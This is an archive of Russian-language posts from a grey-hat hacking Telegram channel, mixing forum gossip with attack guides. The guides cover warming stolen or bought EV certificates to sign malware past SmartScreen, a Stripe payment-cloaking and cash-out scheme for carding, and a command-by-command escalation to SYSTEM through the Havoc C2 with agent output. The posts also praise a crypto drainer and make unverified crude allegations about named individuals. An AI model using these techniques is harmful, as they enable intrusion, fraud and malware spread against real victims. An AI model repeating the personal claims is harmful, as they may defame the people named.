KnightPentest🛡
Open in Telegram
⚠️Весь материал используйте только в ознакомительных целях⚠️ Чат, приходи общаться, бро @GreyHatChat
Show more6 843
Subscribers
No data24 hours
+6167 days
+3 49330 days
Posts Archive
6 843
CryptoGrab - худший криптодрейнер, с заебистой рекламой, как у браузера Амиго. Также они присутствовали на конференции MAC Affiliate Conference в Армении.
Мы - KnightPentest не давали разрешения рекламироваться в нашем телеграм канале. И считаем, что никакого толка от их конторы нет.
Вот профиль этих ребят, любителей халявной рекламы: https://xss.is/members/245402/ репутация в хакерской среде у них крайне хуевая, депозита на форуме нет.
https://xss.is/threads/113710/ - а тут они плачутся, что Angel Drainer ебет их=)))) 😂😂😂
Angel Drainer - двигает хакерское комьюнити вперед, постоянно спонсирует форум XSS, устраивает интересные конкурсы, щедро платит за рекламу.
А CryptoGrab шайтанская контора, которая нашла пару баб и разместилась в Армении. Жалкая пародия, которая не должна существовать в хакерских кругах.
Как Яндекс допустил эту хуйню: https://yandex.ru/maps/org/kriptograb/117067298397/?ll=-0.119528%2C51.516997&z=16
Это просто п@#$ец. Чернуха рекламится в моем паблике и мне еще не платят. С х**яли???
6 843
Но за бабки ДА=)))) TELEGRAM ADS пропускает рекламу криптодрейнеров😂😂😂
Причем сука в моем канале рекламируются эти ребята. Утром проснулся зашел в свой канал увидел=)))
Лучше б мне заплатили. Я бы пост сделал))
Telegram Ads Platform — официальная платформа для запуска рекламы в мессенджере.
6 843
После задержания Павла Дурова выходят нежелательные французские обновления👀
- Теперь авторы статей не могут прикреплять скриншоты в telegra.ph (ранее можно было не по ссылке прикреплять, а из подгрузить файл)
- Полезные телеграмм каналы по информационной безопасности не индексируются в поисковой выдачи телеграм. Так например @mirea находится в теневом бане=) Спасибо, что хоть по @knightpentest можно найти :DDD
- Многие OSINT телеграм боты удалены, а каналы с утечками попадают в теневой бан и нужно оспаривать в тех. поддержке.
#telegram
6 843
Дневники программ вымогателей 5 шт👀
Читать в pdf: https://t.me/GreyHatChat/275/11366
#кибербезопасность #activedirectory
6 843
Ar3s основатель проекта Damagelab, ботнета Andromeda. Или просто крутой мужик за которым охотились ФБР комментирует ситуацию, которая связана с KnightPentest журналистом=)))
Добрый день. Тут на форуме была очередная история где я, якобы, дал интервью каким-то типам из телеги. До этого (в июне кажется) была история в дискорде, где мой "ученик" открыл курсы пентеста. Благо там быстро удалось всех вывести на чистую воду. У меня вопрос. Что за нахер такой? Я больше не даю интервью, не лезу в пентесты, хакинг, форумную жизнь и даркнет в целом. Есть два форума куда я захожу иногда, просто почитать, что в мире творится. Это XSS и Exploit. У меня никогда не было учеников, у меня не осталось близких друзей в даркнете (вернее люди остались, только я не знаю их новых никнеймов, и, наверное, уже не хочу знать, что бы не подставить осознанно или случайно), я не разрабатываю и не продаю ничего что связано с даркнетом. У меня нет проблем с законом. Я работаю на прежнем месте. Меня волнует успеваемость моего ребенка в школе, здоровье моих родителей и счастье в моей семье. Ради эмоций езжу 1-2 раза в неделю на мотоцикле по лесам и полям. Мне 41 год и я стал ленивой жопой. А теперь по ситуации. Я вижу, что некоторые умники начали спекулировать старыми никами. Просто ради пиара и продвижения собственных интересов. Это сильно напрягает. Я предлагаю admin сделать какой-нибудь топик, где у любого из старых пердунов можно уточнить давал ли он интервью или материалы кому-то, куда-то или это очередной вброс. Я с удовольствием подпишусь и буду отслеживать сообщения в такой теме. Ну или просто по человечески прошу, если наткнетесь на очередное интервью или любую иную хероту с моим участием - дайте знать пожалуйста. PM форума (уведомление на почту упадет), старые жабы ar3s@dlab.im, ar3s@exploit.im, ar3s@thesecure.bizadmin xss отвечает Аресу
Ar3s, да, неприятно. Начало здесь student, он же Ново-Огарёво уже в бане. Я знаю только 2 "Ареса" - Ar3s и Ares (Intercepter-ng). Оба - уважаемые люди, с именем. В частной беседе student сказал, что его обманули, он не со зла и ничего дурного сделать не хотел. В любом случае, это было максимально глупо, местами даже смешно. Никто из стариков не поверит, что разговор был с Ar3s, ответы явно не твои, это сразу видно. Даже не знаю, кто бы мог поверить в этот текст, возможно, те, кто тапает хомяка?Наши комментарии Очень рады, что Сергей Ar3s влиятельный эксперт, основатель damagelab читает наш канал. Это правда круто👍🏻 Не было задачей навредить форуму и Сергею уж точно🏆 Журналистка Елизавета x4n4x из команды KnightPentest комментирует
Серёж, это я брала интервью. Меня подставили украинские хакактивисты, прости, пожалуйста дуру💔@mirea - авторитетный блог по информационной безопасности💪
6 843
Anton Lopanitsyn aka Bo0oM поделился расширением для Burp Suite, которое используют багхантеры для выявления SQL INJECTION и других уязвимостей😻
➡️ https://github.com/volkandindar/agartha
🔥 - благодарность Буму, Антону, Кавычке
@mirea - авторитетный блог по информационной безопасности💻
#pentest #web #burpsuite #portswigger
6 843
student интересные факты о криминальном элементе👀
- Брат братвы
- Зять админа xss
- Писатель, журналист
- Бывший хакер
- Неадекват
- Подвергся деанону со стороны Лизы x4n4x security (ранее была сотрудницей бизона, при чем старший пентестер)
- В нетрезвом состоянии был замечен с Лизой x4n4x security, сосал ее в щеку.
- высшее незаконченное образование. - Отчислили за рекламу криптомиксеров.
- мусорской (по мнению пользователей exploit)
- Сомнительный персонаж (по мнению братвы)
6 843
Злоумышленники покупают EV сертификаты для пролива инсталлов
Автор: Liza x4n4x security, стажер айти компании KnightPentest (в прошлом старший пентестер компании #bi_zone) Эксклюзивно для KnightPentest Community👺
Что такое EV сертификат🔍
EV-сертификат (Extended Validation) — это вид SSL-сертификата, который требует самой строгой проверки перед выдачей. Его основная задача — убедить посетителей сайта в том, что они действительно на доверенном ресурсе, принадлежащем легальной компании.Чем полезно для плохих парней😤 🔴Полезен при взломе сайтов с EV-сертификатами: Удачный взлом такого сайта позволяет использовать доверие пользователей к сертификату. 🟢EV-сертификаты могут быть полезны злоумышленникам в контексте программного обеспечения (софта) для создания поддельного доверия к вредоносным или нежелательным программам. Основная цель использования EV-сертификата для софта — убедить операционную систему, антивирусные программы и пользователей в том, что программа надёжна и легитимна. Почему хакеры прогревают сертификаты❕ 🟣 Прогрев нужен на детект от chrome. "Прогретый" сертификат (сертификат с историей использования) вызывает меньше подозрений, поскольку браузер видит его как проверенный и менее вероятно заблокирует или пометит загружаемое ПО как опасное. 🟠Вредоносное ПО с прогретым сертификатом имеет больше шансов быть установленным пользователем, так как выглядит безопаснее и вызывает меньше вопросов. 🔴Злоумышленники могут создать и распространять "легитимные" программы, которые не вызывают подозрений (например, небольшие утилиты), и подписывать их этим сертификатом. Чтобы заполучить репутацию=) Это чем-то напоминает спам через smtp, цель попасть в inbox, а не spam. Спаммеры стараются создать репутацию для своего домена или IP-адреса, чтобы системы антиспама доверяли им больше 🔵Злоумышленники используют дешевый трафик (например, из Индии или Бразилии) и распространяют легитимное ПО в разных регионах. Это помогает увеличить число установок и создать статистику использования, чтобы сертификат выглядел надёжным для антивирусов и Windows Defender. После того как сертификат набрал траст (обычно это занимает некоторое время и несколько тысяч установок), злоумышленники начинают подписывать этим же сертификатом вредоносное ПО. Преимущества подписи EV сертификатом 🔵мгновенное подтверждение репутации в фильтре Microsoft SmartScreen 🟣подпись неограниченного количество приложений одним сертификатом 🔴позволяет игнорировать красные/жёлтые алерты User Account Control (UAC) 🔵более долгий срок жизни сертификата, в сравнении с другими видами сертификатов 🔴приложения подписанные сертификатом вызывают большее доверие у пользователей Возможные варианты передачи EV сертификата 🟢Если клиент имеет на руках SafeNet eToken 5110 CC / Rutoken 3.0, то продавец серта может выпустить сертификат прямо на клиента токен 🔵Продавец может предоставить клиенту удалённый доступ к токену с уже установленным сертификатом, тем самым, клиент сможет подписывать приложения не имея токена на руках 🟣Продавец может отправить токен с уже установленным сертификатом клиенту/дропу через транспортные компании 🟢Продавец может подписать клиента файлы приобретенным сертификатом, чтобы клиент не тратил на это время / не создавали себе головную боль на тему покупки и хранения токена. Стоимость EV сертификата (ориентируемся на рынок злоумышленников) 💰 🟠Цена сертификата из наличия: 4,000$ 🔴Цена сертификата под заказ: 3,000$ Важная информация💔
Облачные провайдеры и некоторые CA могут отправлять данные о подписанных приложениях для проверки. Таким образом, злоумышленник, подписывающий вредоносное ПО, может оказаться под мониторингом самого CA, что создаёт риск отзыва сертификата и добавления подписанных файлов в антивирусные базы.
Если хакер использует сертификат, попадая в базы, такие как VirusTotal, то другие службы безопасности и антивирусы могут получить доступ к информации о сертификате и подписанных им файлах. Это создаёт риск для дальнейшего использования сертификата, так как его репутация может ухудшиться.@mirea 💻 #pentest
6 843
Рыжая бестия Елизавета x4n4x KnightPentest security, продолжает раскрывать злобные деяния кардеров👀
Всем привет! Я Елизавета, ранее работала старшим пентестером в компании #bi_zone на данный момент решила отвлечься, вступить в молодое комьюнити "KnightPentest". Ребята очень перспективные, иногда буду делиться своими короткими наработками=)
Елизавета про малолетних кардеров на вещевухе🖕
В последнее время бл*ять эти американские кардеры стали такие мягкие, как детское говно нах*й. Если они не стоят ни на чем, то упадут от всего.Один диллер е*нулся совсем и присылает мне в ватцап....
i need to develop payment cloak that would do a b redirection, User places order on site A (high risk) - User gets redirected to site B (low risk / Stripe approved) payment page - Order is created on both sites, random products are added to the order on site B and the order value from site A is matched. - Stripe thinks the traffic comes from site B and processes the payment.Стоит пояснить что сайт A - это фишинг. Куда злоумышленник направляет клиента. А вот сайт B - это вполне себе легитимный сайт, например как магазин футболок у бизона❕ Про клоакинг помните мы писали ранее, мой партнер Макс (x999x) Кирцов который да, сливал на экспу готовый вариант. Дак вот суть такая же. основная идея такой схемы — использовать легитимный магазин, чтобы списать деньги с карты через одобренный Stripe сайт (сайт B) Создание или использование двух сайтов:
Сайт A — основной сайт, где пользователи размещают заказы на высокорисковые или запрещённые товары и услуги. Сайт B — легитимный и надёжный сайт, который подключён к платёжной системе (например, Stripe). Этот сайт обычно проходит проверки, имеет высокое доверие и одобрение со стороны платёжных систем. Перенаправление пользователя: Когда клиент оформляет заказ на сайте A, система перенаправляет его на сайт B для оплаты. На сайте B создаётся "поддельный" заказ, который соответствует сумме заказа на сайте A, но с другим, менее подозрительным списком товаров или услуг. Обработка платежа на сайте B: Пользователь оплачивает заказ на сайте B через Stripe или другую платёжную систему, которая видит транзакцию как легитимную и обрабатывает её. Поскольку сайт B не вызывает подозрений, платёжная система завершает транзакцию. Получение средств: После того как плата пройдена и средства поступают на счет сайта B, злоумышленник получает доступ к этим средствам. Обычно это делается через вывод денег с подключённого банковского счёта или кошелька. Часто злоумышленники могут использовать подставные компании или дропов (людей, которые временно предоставляют свои счета) для вывода средств, что усложняет отслеживание. Перевод денег или обналичивание: Деньги, зачисленные на аккаунт сайта B, затем могут быть переведены на другие счета или обналичены через банковские переводы, электронные кошельки или даже криптовалютные обменники, чтобы скрыть конечного получателя и затруднить отслеживание.@mirea - авторитетный блог по информационной безопасности💻
6 843
Российские хакеры не рады видеть AELS/CrazyMark
- Андрей Тарасов (AELS) - сдал своих партнеров.
- Пользователи хакерских форумов обвиняют пользователя AELS в терроризме, т.к он жертвовал свои финансы ВСУ.
- AELS вернулся на форумы под другим никнеймом и заявил, что его родина это весь земной шар.
Данная информация - это лишь мнение форумных пользователей и она может отличаться от действительности. Но проанализировав некоторые комментарии можно сделать вывод, что Андрея (AELS), который избежал наказания и сейчас находится в РФ поддерживают в основном украинские партнеры.
Голосование
🧡 - комментаторы правы AELS сбежал в РФ как запахло жаренным и всех сдал.
🔥 - сплетни. Пусть сначала докажут.
@mirea - авторитетный блог по информационной безопасности⚡️
6 843
DPAPI для чайников(практика)🖥
Автор: Елизавета x4n4x security (эксклюзивчик для @mirea)
Даже имея SID, MasterKey, Entropy и Clear Text, получить идентичный результат DPAPI с помощью онлайн-сервисов не удастся из-за системных зависимостей и уникальных метаданных, которые добавляет сама Windows.
Наша задача лишь понять примерный алгоритм на практике. Узнаем где что хранится и как это работает=)
Первое, что мы сделаем - это узнаем SID текущего пользователя
whoami /user
KnightPentest\Lizka S-1-5-21-4170774641-386150424-2152198521-1601Узнаем где хранится masterkey🥡
C:\Users\Lizka\AppData\Roaming\Microsoft\Protect\{SID}
Не забудьте {SID} заменить на свой
Многие файлы могут быть скрыты в этой директории, поэтому если вы хотите осмотреться, то не забывайте добавлять флаг /a
dir /a
2518e0b6-babc-4fea-85e8-8ecd9166c0d3 8b3b12b1-9ec1-4095bc12-91194cb05828 PreferredФайлы содержат зашифрованные MasterKey. Их два, потому что пароль пользователя был изменён. При смене пароля создается новый файл с зашифрованным MasterKey, а старый файл не удаляется, поскольку ранее зашифрованная информация привязана к нему. Файл Preferred указывает на текущий MasterKey, который считается "активным" и используется по умолчанию для новых операций шифрования. Перейдем на уровень выше ../
CREDHISTФайл CREDHIST хранит зашифрованные хеши предыдущих паролей пользователя, чтобы система могла проверять их уникальность и требовать новый пароль, если старый уже использовался. Вот схема шифрования текста "Knight" с помощью DPAPI
Clear Text ("Knight")
↓ (Преобразование в байты)
[75, 110, 105, 103, 104, 116] (Clear Text в байтах)
↓
SID (S-1-5-21-123456789-123456789-123456789-1001)
↓ (Поиск MasterKey для текущего SID)
MasterKey: bde4c2b27c3b4df5a7a7d8f6350f9f7b
↓
Entropy ("MyExtraSalt")
↓ (Преобразование Entropy в байты)
[77, 121, 69, 120, 116, 114, 97, 83, 97, 108, 116] (Entropy в байтах)
↓ (Генерация Session Key на основе MasterKey и Entropy)
Session Key: 5d4a5b6f9a2e4c7f6b5d4f2e4a5d6c3e
↓
[75, 110, 105, 103, 104, 116] (Clear Text в байтах)
↓ (Шифрование с использованием Session Key)
Ciphertext: [202, 176, 56, 193, 215, 239] (примерный зашифрованный текст)
↓ (Кодирование в Base64)
Ciphertext (Base64): AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAKFGN+LtFbG6D4bJG4vS...
Как дешифровать
Ciphertext (Base64): AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAKFGN+LtFbG6D4bJG4vS... ↓ (Декодирование из Base64) Ciphertext (байты): [202, 176, 56, 193, 215, 239] (примерные данные) ↓ (Получение SID текущего пользователя) SID: S-1-5-21-123456789-123456789-123456789-1001 ↓ MasterKey: Система использует SID для нахождения нужного MasterKey MasterKey: bde4c2b27c3b4df5a7a7d8f6350f9f7b (загружается из защищенного хранилища) ↓ Entropy ("MyExtraSalt") (если использовалась при шифровании) ↓ (Преобразование Entropy в байты) Entropy (байты): [77, 121, 69, 120, 116, 114, 97, 83, 97, 108, 116] ↓ (Генерация рабочего ключа на основе MasterKey и Entropy) Session Key: 5d4a5b6f9a2e4c7f6b5d4f2e4a5d6c3e (тот же рабочий ключ, что и при шифровании) ↓ Ciphertext (байты): [202, 176, 56, 193, 215, 239] ↓ (Расшифровка с использованием Session Key) Clear Text (байты): [75, 110, 105, 103, 104, 116] ↓ (Преобразование байтов в текст) Clear Text: "Knight"Многие стандартные программы и службы Windows, а также сторонние приложения, использующие DPAPI, по умолчанию не применяют Entropy для шифрования. В таких случаях данные шифруются только с использованием MasterKey, что позволяет расшифровывать их, зная только учетную запись пользователя (SID) и системные ключи. @mirea - авторитетный блог по информационной безопасности💻 #pentest #windows #шифрование #ctf #capturetheflag
6 843
DPAPI для чайников(теория)🖥
Автор: Елизавета x4n4x security (эксклюзивчик для @mirea)
DPAPI (Data Protection API) — механизм Windows для шифрования данных, привязанный к учетной записи пользователя или машины.👉Где используется - Internet Explorer/Edge (для сохранения паролей) - Chrome и Firefox (защита данных пользователей) - Outlook (защита учетных данных) - Windows Credential Manager (управление учетными данными) Основные понятия💡 Clear Text - данные в открытом виде, которые требуется зашифровать SID (Security Identifier) - Уникальный идентификатор пользователя или группы в Windows, привязанный к каждому пользователю MasterKey - Основной ключ шифрования, созданный и управляемый Windows для каждого пользователя. MasterKey используется DPAPI для генерации временного рабочего ключа, который шифрует данные. Entropy - соль (опционально) Рабочий ключ (Session Key) - Временный ключ, генерируемый на основе MasterKey и, при необходимости, Entropy Ciphertext - Зашифрованные данные, полученные после применения рабочего ключа к Clear Text. Ciphertext вместе с метаинформацией кодируется в Base64 для хранения и передачи. DataProtectionScope - определяет каким образом привязываются зашифрованные данные. CurrentUser — данные привязываются к текущей учетной записи пользователя. LocalMachine — данные привязываются к компьютеру и могут быть расшифрованы любым пользователем на данной системе. Метаинформация DPAPI - Служебные данные, добавляемые в зашифрованный результат, такие как версия DPAPI и параметры шифрования. Эта информация позволяет DPAPI корректно определить параметры при расшифровке. Теперь необходимо полученную информацию закрепить на практике✔️ (читайте следующую часть) @mirea - авторитетный блог по информационной безопасности💻 #pentest #шифрование #windows
6 843
Генератор словарей: https://app.wgen.io/
Есть возможность указать немало информации, которую вы ранее собрали из открытых источников🏆
Источник: @mirea
#pentest #web
6 843
Когда готовилось это интервью изначально мы заливали его на teletype=)) Меньше, чем за сутки администрация платформы (teletype) удалила его😁😁😁
Зато на teletype есть статьи по каржу: https://teletype.in/@bjh_garant/zalivlogs
Реверсеры видимо опаснее. По👀
6 843
Повышаем привилегии до SYSTEM🏆
Ранее я показывал как с помощью dll hijacking с обычных пользователей доапаться до админа. Теперь проберемся сразу до SYSTEM. Я использую C2 Havoc (как его установить я тоже рассказывал).
Listeners --> Add --> Name любое, в Host (Bind) указываем тот интерфейс через который наша жертва может с нами общаться (видеть нас) --> save
Attack --> Payload --> Format: Windows Exe --> Generate
На хосте там где мы входим в группу администраторов прописываем
shell whoami /priv
SeImpersonatePrivilege - нас интересует эта привилегия (у меня она был включена).
Гуглим 🔜 SeImpersonatePrivilege exploit
Вот некоторые варианты ✔️
- SigmaPotato (про картошки рекомендую почитать чуть подробнее и посмотреть видеоролик blackhatusa, баламут зальет в чат)
- PrintSpoofer
- NetworkServiceExploit
Я буду использовать 3 вариант. Через C2 Havoc shell прописываем
shell NetworkServiceExploit.exe -i -c xxx.exe
Где xxx.exe - это наш агент C2.
Сразу получаем сессию и проверяем сидку=)
24/10/2024 17:59:37 [knight] Demon » whoami
[*] [9AD032CF] Tasked demon to get the info from whoami /all without starting cmd.exe
[+] Send Task to Agent [31 bytes]
[+] Received Output [4824 bytes]:
WORKGROUP\bratva$ S-1-5-18
SID S-1-5-18, известная как SYSTEM. В отличие от учетных записей администраторов, которые ограничены в некоторых аспектах безопасности для защиты системы от ошибок пользователя или вредоносного ПО, SYSTEM фактически является "суперпользователем", обладающим наивысшими привилегиями.
Полезная шпаргалка по привилегиям. Тут даже есть эксплоиты:
- https://github.com/gtworek/Priv2Admin
@mirea - авторитетный блог по информационной безопасности💻
#pentest #ctf #capturetheflag #activedirectory #redteam6 843
Андрей Владимирович Тарасов (AELS) смог вернуться в Россию👍
Подробная информация: https://www.secretservice.gov/investigations/mostwanted/tarasov
6 843
Nvidia закрыла пользователям из РФ доступ к обновлениям драйверов видеокарт — об этом сообщает @mirea
Это очевидная иностранная пропаганда нацеленная на повышения риска кибератак в РФ.- Обновление через сайт не работает. Блок на РУ айпи. с ВПН всё нормально грузит. Через приложение тоже всё четко, без проблем обновилось
6 843
Новая статья от рыжей бестии Елизаветы x4n4x security в прошлом старший пентестер #bi_zone ныне стажер айти компании KnightPentest
Майнер от инженера НИЦ Курчатов
Читать: https://ox6d7266.ru/2024/10/08/LPSOPG-miner-ot-nrckir.ru.html
#bizone #osint
6 843
Жесть=) Человеку помочь уже жалко. Этот мир совсем прогнил. Актуальный контент только у KnightPentest 👀
* Признаны нежелательной организацией на всех хакерских форумах *
Подборка полезных статей✔️
- API Acunetix + SQLMAP
- My First Burp Extension | Enable Tor Proxy By Burp
- How to Rotate IP ADDRESS For Each Request in Burp Suite
@mirea - нежелательная организация в хакерских кругах💻
#pentest #burpsuite #proxy #opsec #web
6 843
Новости из мира фраеров =)) 👀
Мы ранее размещались на таких площадках:
- damagelab (xss)
- exploit
- BreachForums
- Некоторые другие малоизвестные ресурсы
Подводим некоторые итоги
- Работать на клиентов - это неблагодарная работа.
- Все хотят выехать на твоем горбу, заплатить ниже рынка, получить дополнительную консультацию. И рыбку съесть на хуй сесть.
- Быть форумным кодером - это не про деньги. Скорее ты начинаешь обладать знаниями, получаешь сервисы, мысли злоумышленников. И уже понимаешь откуда ноги растут.
- 75% киберпреступников неопытные пользователи. Некоторые не умеют пользоваться powershell, командной строкой.
ЦА на форумах
XSS - отсюда приходили самые адекватные парни, у которых есть потенциал. Были интересные кейсы, не жалко даже было разработать софт в 5 раз ниже рынка=) Но как только бабки закончились - энтузиазм утих, та и еще нас оттуда выпиздили, когда узнали, что мы никакого отношения к хакерам не имеем=)))
BreachForums - постоянно какая-то подстава. Большие подозрения, что пишут только спецслужбы. Максимально черная работа от которой всегда отказывались. Увы на этом форуме делать нечего.
exploit - оставим без комментариев. Там некоторые парни вообще не планируют развиваться, кто-то бл*ть файл создать на windows не смог, к кому-то по анидеску пришлось подключаться запускать cmd.exe и прописывать путь до папки.
Мы очень не любим работать с необразованными людьми, хамами, нервы не выдержали=))) С сегодняшнего дня наш сервис закрыт. Опыт хороший, главное к этому никогда не вернуться😂😂😂
Нашего кодера кстати взяли в T-BANK, частично поэтому работа прекратилась. Нет времени, та и нах*й надо, жрать тоже хочется. Всем советуем работать официально.
